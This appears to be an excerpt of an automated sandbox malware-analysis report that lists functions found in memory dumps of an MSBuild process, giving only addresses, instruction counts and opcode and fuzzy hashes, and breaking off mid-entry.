Function 01373E3E Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e8e6904603b4cc316513b74095c860b824abd2adc72881be81263fed46b3f8e
Instruction ID: 6e0cbd3fcf83596f716e6dc918aa4980df0df02fdeba376c0d053dad236b10e6
Opcode Fuzzy Hash: 7e8e6904603b4cc316513b74095c860b824abd2adc72881be81263fed46b3f8e
Instruction Fuzzy Hash: 23916B71E00209DFDF20DFA9D8857DDBBF2BF48358F148129E419A7294EB789885CB91

Function 013747CC Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ebbbd9ccf45b46b84e5bb2c84cd2d936698e6978367a5c1320231d964e1bcb6
Instruction ID: 5b72bc55f43bafa8798d1390259b802aafff09cfdde768f2b07787d12e1b4963
Opcode Fuzzy Hash: 8ebbbd9ccf45b46b84e5bb2c84cd2d936698e6978367a5c1320231d964e1bcb6
Instruction Fuzzy Hash: 7B715AB0E10249DFDF24DFA9C88579EBBF1AF89318F148129E415A7254EB78A841CF91

Function 013747D8 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bdb82dc1dd926a2adf30f1b35c5137ca01a30729d31458e49615f05248b430b
Instruction ID: 134201f6fba078e9d36347dc08d5beed89bd9131d00c4e97639b31ac5cd29620
Opcode Fuzzy Hash: 6bdb82dc1dd926a2adf30f1b35c5137ca01a30729d31458e49615f05248b430b
Instruction Fuzzy Hash: A3717C70E10249DFDF24CFA9C88579EBFF2AF89318F148129E415A7254EB78A841CF91

Function 01376CA4 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8faebaac5c61df5314bf9ff244ef66cdd8ec2bd97941e3e7d25aa9df2cb97173
Instruction ID: 2a779e2ce0ddd879302a31c8076dbe376a52addf6ce438680399f40bb84ef854
Opcode Fuzzy Hash: 8faebaac5c61df5314bf9ff244ef66cdd8ec2bd97941e3e7d25aa9df2cb97173
Instruction Fuzzy Hash: 6C5155B0D106188FEB24CFA9C895B9DBBF1FF48314F148129E819AB365D778A844CF95

Function 01376CB0 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1549c7c6d5ef7dee23e0317e086ee1f4a28c7bac5a28bcd9b1d297ef7b387600
Instruction ID: 22894d6b588c743f20cc060557d4146a5a9daf8269f1b06e50a07b04ac97205e
Opcode Fuzzy Hash: 1549c7c6d5ef7dee23e0317e086ee1f4a28c7bac5a28bcd9b1d297ef7b387600
Instruction Fuzzy Hash: 985145B0D106188FEB24CFA9C895B9DBBF1FF48314F148129E819AB365D778A844CF95

Function 01371128 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 205285959a3aaf8eb17dfd206357e165f08b779b964236fad41cd50f472f783e
Instruction ID: 9d282371664eb508bc37f4e2bf15c8296962e538f59066aa418696036bbe5779
Opcode Fuzzy Hash: 205285959a3aaf8eb17dfd206357e165f08b779b964236fad41cd50f472f783e
Instruction Fuzzy Hash: E7510972A71243CFCB06FB28F8919553FB6F7913047248A6DE5408B32EDA786949CB90

Function 01371138 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ee38d5703a0c07925eeca732933b80ec8e61c1bbdd1b0aca534ef5b5bf14173
Instruction ID: 61cf2eff4b38f1b589b5dbba6393bc5cfde41e10cc827152842464d192f03d71
Opcode Fuzzy Hash: 4ee38d5703a0c07925eeca732933b80ec8e61c1bbdd1b0aca534ef5b5bf14173
Instruction Fuzzy Hash: CE41FA72671243CFCB06FB28F8919553FB6F7953057208E6DE5408B32EDA786949CB90

Function 0137F328 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fcbb8d3e96c67a003e50abdee47ebf3fa730a77864c3c8133f06520a1ae8ea4
Instruction ID: 495c221de26e866e9b18a086ac5facaffa08f31a477a09af108fb241b17a19e2
Opcode Fuzzy Hash: 7fcbb8d3e96c67a003e50abdee47ebf3fa730a77864c3c8133f06520a1ae8ea4
Instruction Fuzzy Hash: 3631AB34A102069BDB29CF79D4946AEB7B6FF89314F10C529E816EB351EB34AC42CB40

Function 013726A6 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51be03f589d514d2ce50ccd85dfc54646fba1fb93a32acd16d0a3eff0f2cb034
Instruction ID: a7acbf601cb3c73455a4661bcc7bc1b95c4ef16c8b9fc60285e192478ed6ed8e
Opcode Fuzzy Hash: 51be03f589d514d2ce50ccd85dfc54646fba1fb93a32acd16d0a3eff0f2cb034
Instruction Fuzzy Hash: 2E41F1B0D003499FDB14CFA9C984ADEBFF5FF48314F208429E809AB250DB79A945CB91

Function 0137F338 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db69cc0be02c4b3b3fa0b749affa8e87cce72335d88036fb2bb890f4a72c9f2b
Instruction ID: ab5bcea43f1eb6a40ef3385496eb434eba053764716c3c4b9bf77e661833dc29
Opcode Fuzzy Hash: db69cc0be02c4b3b3fa0b749affa8e87cce72335d88036fb2bb890f4a72c9f2b
Instruction Fuzzy Hash: 15317C34A102068BDB19CF79D59469EB7B6FF89304F10C529E816EB354EB74AC42CB50

Function 0137178A Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15bcdb8af5663bb6f50b9229379ce2df0f902157df0de8f2d30af93f07b052df
Instruction ID: 2db25d906ebc6a1cfd0cc879cba14bb62b85922309a7dd41697dacbf466da614
Opcode Fuzzy Hash: 15bcdb8af5663bb6f50b9229379ce2df0f902157df0de8f2d30af93f07b052df
Instruction Fuzzy Hash: 88310B73F002559FCF319A78D5843AA7FA9EB85768F1404A9DA06C720AF6398400CBC1

Function 013726B0 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f04cd98b181815a38a340badf6d5e8ccf4090ae4fd9a9255dbe554b3df4e1d76
Instruction ID: d095a16769f52759a4e4452f3a61795fcfcfe8aac48c5f8658abc335645a9ba6
Opcode Fuzzy Hash: f04cd98b181815a38a340badf6d5e8ccf4090ae4fd9a9255dbe554b3df4e1d76
Instruction Fuzzy Hash: 1641EFB0D003499FDB20DFA9C584ADEBFF5FF48314F208429E809AB250DB75A945CB91

Function 013792D1 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b23601a40289926ca5e9147127e42c5fba2716ab81a3ead0db3ec31e341c4b6
Instruction ID: 6177b16526d34b8c4414e27adb59d27fb5d02aa405dcf5ae86cafb63426a35e5
Opcode Fuzzy Hash: 0b23601a40289926ca5e9147127e42c5fba2716ab81a3ead0db3ec31e341c4b6
Instruction Fuzzy Hash: C831A231E1020A9BDB19CF69D4907DEB7B2FF89318F10D62AE805EB351DB749842CB50

Function 01377059 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbb014ffc15719ee6df82b47f872d703a9d0f49d11081693d7f168a341911a39
Instruction ID: f4d53489dc35db7147949851d230e20eae61f63d637321389b0b0bce6ba4441f
Opcode Fuzzy Hash: fbb014ffc15719ee6df82b47f872d703a9d0f49d11081693d7f168a341911a39
Instruction Fuzzy Hash: 2D212B39B202168FDB05EB78D95466E77B7BBC8704F20846CE5068B3A8DF359C42CB90

Function 0137133F Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a57e521228693fb67f71d7de24229622fb4d1cf73d0cdab730f9e021376be42
Instruction ID: eb57e86f61ccc687fd6e2f5ead881d75d7e3194f4ede5371a870baea700fc655
Opcode Fuzzy Hash: 0a57e521228693fb67f71d7de24229622fb4d1cf73d0cdab730f9e021376be42
Instruction Fuzzy Hash: 81210A766102028FEB33562CD4883AC3769FB42318F5008BEE606E7796E73DC885C742

Function 0137166A Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a36bab9fc6fb92c385e0db5fcc2c726543cdc0429a425c2437e2f0367bd6db0
Instruction ID: 19c1c7f63de9bfa8f712ef7236de8c25a8aaf24ecdeb961786a47cb6eba668a5
Opcode Fuzzy Hash: 4a36bab9fc6fb92c385e0db5fcc2c726543cdc0429a425c2437e2f0367bd6db0
Instruction Fuzzy Hash: 7E2195766301434FDF23EB3CE9847597769EB45328F208965E405CB36BEA3C9C458B91

Function 013792E0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ea36f93b00f38a6a5dc96abc9d006d465e249efb6b9463471e5d6c3e414f7e5
Instruction ID: 84b038046cfae3acd2b2c86bdffed6691a3597d5673f084f8df0701a3edab666
Opcode Fuzzy Hash: 6ea36f93b00f38a6a5dc96abc9d006d465e249efb6b9463471e5d6c3e414f7e5
Instruction Fuzzy Hash: FE219130A1020A9BDB19CF69D49079EB7B2FF89318F10D629E905EB391DB749841CB90

Function 013791D0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4731266d059c1f8b68cdb9d8d6da69b28633b1653e77f5c6ca2420c4bef1856f
Instruction ID: de2421a16ebc0089c1ebdbe3bebdd917b4bfb19fc25f89aedf7139c15405f223
Opcode Fuzzy Hash: 4731266d059c1f8b68cdb9d8d6da69b28633b1653e77f5c6ca2420c4bef1856f
Instruction Fuzzy Hash: F121A431E00209DBDB19DFA9C440ADEF7B6AF89314F14862AEC15F7351DB749942CB50

Function 01374F52 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ad399f9f6ba2482f24c63b3d51d6a880f7132062fb8b051bfcdb7eb9507ae82
Instruction ID: f5ff7483081c1173000a9498d9b6d6bdc76e092ac6a12b03d323168dbe5ce8a0
Opcode Fuzzy Hash: 7ad399f9f6ba2482f24c63b3d51d6a880f7132062fb8b051bfcdb7eb9507ae82
Instruction Fuzzy Hash: 5A213731B00209CFDB29EB78C559A9D77F5AB4D308F10046DE402EB365DB3A9D01CB90

Function 0130D394 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521031469.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130d000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1383349dd29565281c6464b18fb937ea14d547e35ac9f9eae84c9db9d255079c
Instruction ID: 4033bbba4af26f753333beba671816b3f5bbd4b9f6aae361282a6e6cc2129191
Opcode Fuzzy Hash: 1383349dd29565281c6464b18fb937ea14d547e35ac9f9eae84c9db9d255079c
Instruction Fuzzy Hash: 24210771604244EFDB06DFD8D5D0B25BBE5FB84318F24C5ADD80A5B682C736E446CA62

Function 0130D1E4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521031469.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130d000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 565793511c5c2101f245bc2200f423f1b76a94bd3799d9559024387c26ff4820
Instruction ID: 0c872b080dd287f2bfbc850bed8f2c45cb2d67869c2b6cbbbe577ef22764cbe7
Opcode Fuzzy Hash: 565793511c5c2101f245bc2200f423f1b76a94bd3799d9559024387c26ff4820
Instruction Fuzzy Hash: 8D2126B1504244DFDB02DFD8D5D0B26BBE9FB84328F24C669D8090B686C336D446CAA1

Function 0130D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521031469.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130d000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 604cbbcd540eb0763c4552bb9440c9670530b80ddc66d412b75fa0072a101ee4
Instruction ID: c5cd3065e5b9efe43398bdb0fbdc62f2d87703cfe52ae8d28f3f346a5e395476
Opcode Fuzzy Hash: 604cbbcd540eb0763c4552bb9440c9670530b80ddc66d412b75fa0072a101ee4
Instruction Fuzzy Hash: E72122B1604204EFDB16DF98D9D0B26BBE9FB84318F24C56DD80E4B686C33AD407CA61

Function 01371840 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 197c5a3846f217b0e81153969662379f40cd6e4ca0f37411f9eedddae8a23dec
Instruction ID: 0371199439909bc5cf7ff9d1f2dd3a5a13d1697fd945566b21daa64c2e7bde57
Opcode Fuzzy Hash: 197c5a3846f217b0e81153969662379f40cd6e4ca0f37411f9eedddae8a23dec
Instruction Fuzzy Hash: 27218032B14205CFDB25DB78C5157AD7BF2AB4A308F1044ADC506EB791DB3A8C05CB91

Function 013791E0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c5768fb8c9553cd414e4470600e928fa629b6108b30dfb92ac77255ca9be15e
Instruction ID: cbb0fad0875ba4630b7501adbefe27cbb1fe654ae53462d9326756744af47b5d
Opcode Fuzzy Hash: 3c5768fb8c9553cd414e4470600e928fa629b6108b30dfb92ac77255ca9be15e
Instruction Fuzzy Hash: F1219231E00209DBDB29DFA9C540ADEF7B6AF89328F10862AEC15B7350DB749842CB50

Function 01371850 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edc5942510fa18624973e1657ec6a52dd8f59320467e397710a634e9a8555bd5
Instruction ID: a4a26263784da293fbde43f5ead76285de21a2c661eb6bd7866d9eefa909a21a
Opcode Fuzzy Hash: edc5942510fa18624973e1657ec6a52dd8f59320467e397710a634e9a8555bd5
Instruction Fuzzy Hash: 1F213C32B1020ACFDB65EB78C5557AE7BF6AB89208F100469D506EB790DF3ADD01CB91

Function 01370741 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acb7b87eb2107018536a8d5138d5a9319a4b46911524eedf475996b20a898a3a
Instruction ID: 020f77d730265a82301f042363333c917b283189ec35921e364348a816c688ae
Opcode Fuzzy Hash: acb7b87eb2107018536a8d5138d5a9319a4b46911524eedf475996b20a898a3a
Instruction Fuzzy Hash: 2D11D362E24205EBDF3A5A78C44036D3A61E743258F34486AF546CB383D52DCD498BD2

Function 01371678 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 058738e09f31360e47f0b89e9a2ec29b7623a8c51358b92ca31476173b7f45ec
Instruction ID: 34babc9efe6b6038effc6682aa5127ab3b406fd64db2d88c2fcaef9d094dc96b
Opcode Fuzzy Hash: 058738e09f31360e47f0b89e9a2ec29b7623a8c51358b92ca31476173b7f45ec
Instruction Fuzzy Hash: 1E21A57A6301034BDF33E73CE984759772AE744328F208925E506C736BEA3CD8858B81

Function 01374F60 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64e55b23a944a4a042f61220a06fb0af46a470817a3749db59a14bf94c7bdbb0
Instruction ID: f0db7ed5e0d8880153ed0193b2fa82cdc25804d4c796f95669e28c78f1b30a00
Opcode Fuzzy Hash: 64e55b23a944a4a042f61220a06fb0af46a470817a3749db59a14bf94c7bdbb0
Instruction Fuzzy Hash: 7021F835B102098FDB29EB78C558A9D77F5AB4D304F104469E806EB364EB3ADD44CB91

Function 01371450 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d79f78b57575c866cbf9211f53b7ad59463cc6b418f3c18a63562189e52c379
Instruction ID: 12a0a3f6b16df03715c3da386c080586b379e576cf93bdb1a4e444ca6af6bfe0
Opcode Fuzzy Hash: 6d79f78b57575c866cbf9211f53b7ad59463cc6b418f3c18a63562189e52c379
Instruction Fuzzy Hash: 81116072E012159FCF35EFBC89506AD7BF4EF59228B140079E905F7302E6399941CBA1

Function 01370838 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9148b2812bb21b079f3436aac9deca22ea44390b16c73e636573b2269a00ec0b
Instruction ID: afe3c78342dfbe46419d757ac630adc753e3619573be6b4b652f60b75a1ec157
Opcode Fuzzy Hash: 9148b2812bb21b079f3436aac9deca22ea44390b16c73e636573b2269a00ec0b
Instruction Fuzzy Hash: 8711E731A24305ABEF3E6A79C44436D3A95EB43218F24487AF402CF283DA6DCC858BD1

Function 01370848 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 823db09c308e4d94109b4fe0b083eacf1ea0a58ce8a02ec1208337682d25a01f
Instruction ID: 81ba215acd487030ebea7afa71b40e2567ce9cd0a3832104841333647899e728
Opcode Fuzzy Hash: 823db09c308e4d94109b4fe0b083eacf1ea0a58ce8a02ec1208337682d25a01f
Instruction Fuzzy Hash: 68119431B24209ABDF796A7DC44432D3A95EB47218F204939F006CB392DA6DDC858BD1

Function 0130D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521031469.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130d000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction ID: b646e30472dd31c2704153dbf0784baf9d213f3c100604e7e19d0808906ae982
Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction Fuzzy Hash: 2011BE75504280CFDB12CF54D5D4B15BBA1FB44318F24C6A9D8494B696C33AD40ACB62

Function 0130D1DF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521031469.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130d000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d83059ff187c22e3bca89aa6d0a7c180522d0170c37a0a04a994941a968178a
Instruction ID: 07534d5d3ffe31ec96ab4dad5751ea5d62de2ad5b6d40aeb85c3606b21e8b2c8
Opcode Fuzzy Hash: 1d83059ff187c22e3bca89aa6d0a7c180522d0170c37a0a04a994941a968178a
Instruction Fuzzy Hash: CD11B275504280CFDB12CF94D5D4B15FFB1FB84324F24C6A9D8494B696C33AD44ACB91

Function 0130D38F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521031469.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130d000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction ID: 42ca31c8e850e3a80268d5c2cc513c896827cf92b446076e84731e364125331e
Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction Fuzzy Hash: EE11DD75504280DFDB02CF98D5D4B15BFB1FB84318F24C6A9D84A4B692C33AE44ACB62

Function 01371460 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30fd26d2a576e51520a5f2973f910ae65f0cb97d132b1f59dc0e099dbff5f76d
Instruction ID: 49cbd231274c3ea65af2ad6f350c4d1785d3225186a308ae59f6c34bcaf207a5
Opcode Fuzzy Hash: 30fd26d2a576e51520a5f2973f910ae65f0cb97d132b1f59dc0e099dbff5f76d
Instruction Fuzzy Hash: 4A012D32A012158FCF35EFBD88501AEBBF5AB49218B15047AE905F7201E679E945CBA1

Function 012FD89D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4520831548.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12fd000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 508436ed51c51c4f545f835b840390535b5d6e14b77af9f3102c9871363a7a14
Instruction ID: 6fccc701efd04a08c4c39dfb514a06c8c473574c205daf7a9913486db2c6b530
Opcode Fuzzy Hash: 508436ed51c51c4f545f835b840390535b5d6e14b77af9f3102c9871363a7a14
Instruction Fuzzy Hash: AD0126710153099AE7108AA9DCC4B67FF98DF41360F18C43EEF4D0B282C3789845CAB1

Function 01378170 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b3f4b2c73e19decf9d529677ded78bda6fd95c6ae877453f4e57e7f75eadbef
Instruction ID: 3b917aed681d470685bb7a5f1c9cc3f205dbd08844193a762c7610c4bf16d225
Opcode Fuzzy Hash: 2b3f4b2c73e19decf9d529677ded78bda6fd95c6ae877453f4e57e7f75eadbef
Instruction Fuzzy Hash: 45018471A2024BEFCB05FBB8FA40A9C7BB1EF40304F2045A9D904DB256EF346A55C781

Function 012FD89C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4520831548.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12fd000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c60b1716e5f2615588d60e0bcfe6d0ce8b5f610712fdf65cc24035c334e43610
Instruction ID: f36d6e8d028b5520c2ed7c87db142d5306c461f9e05e3a05045e8b06084b6be4
